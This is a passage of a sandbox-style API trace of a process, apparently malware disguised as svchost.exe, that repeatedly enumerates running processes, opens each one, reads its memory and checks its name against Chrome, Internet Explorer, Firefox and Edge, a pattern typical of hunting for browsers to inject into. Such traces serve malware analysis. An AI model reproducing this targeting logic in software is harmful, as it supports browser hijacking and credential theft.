	[0220.784] ReadProcessMemory (in: hProcess=0x4ef0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.784] ReadProcessMemory (in: hProcess=0x4ef0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.784] ReadProcessMemory (in: hProcess=0x4ef0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.784] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.784] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4ef4
	[0220.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.787] NtQueryInformationProcess (in: ProcessHandle=0x4ef4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.787] ReadProcessMemory (in: hProcess=0x4ef4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.787] ReadProcessMemory (in: hProcess=0x4ef4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.787] ReadProcessMemory (in: hProcess=0x4ef4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.787] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4ef8
	[0220.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.789] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.789] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0220.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4efc
	[0220.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.790] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0220.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.791] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.791] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0220.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.792] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.792] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4f00
	[0220.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.845] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.845] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.846] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.846] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.846] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.847] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4f04
	[0220.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.849] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.849] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.850] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.850] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.851] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4f08
	[0220.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.852] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.852] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.853] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4f0c
	[0220.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.856] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.856] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0220.858] CloseHandle (hObject=0x188) returned 1
	[0220.858] Sleep (dwMilliseconds=0x64) 
	[0220.960] GetCurrentProcessId () returned 0x110
	[0220.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0220.965] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0220.967] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0220.969] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0220.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4f10
	[0220.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.970] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.970] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.971] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.971] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.971] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4f14
	[0220.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.972] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.972] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.972] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.973] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0220.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4f18
	[0220.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.974] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0220.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.974] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.974] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0220.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.975] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.975] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4f1c
	[0220.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.976] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.976] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.976] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.977] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.977] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0220.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4f20
	[0220.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.978] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0220.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.978] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.978] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0220.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.979] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0220.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4f24
	[0220.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.980] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0220.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.980] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.980] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0220.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.981] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0220.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4f28
	[0220.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.982] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0220.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.982] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.982] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0220.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.983] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0220.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4f2c
	[0220.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.984] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.984] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.984] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.984] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4f30
	[0220.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.985] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.986] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.986] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.986] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4f34
	[0220.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.987] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.988] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.988] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.988] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.989] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4f38
	[0220.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.989] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.990] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.990] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.991] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.991] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4f3c
	[0220.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.992] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.992] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.992] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.993] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4f40
	[0220.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.994] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.994] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.994] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.995] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.995] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4f44
	[0220.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.996] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.996] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.996] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.997] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.997] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4f48
	[0220.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.998] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.998] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
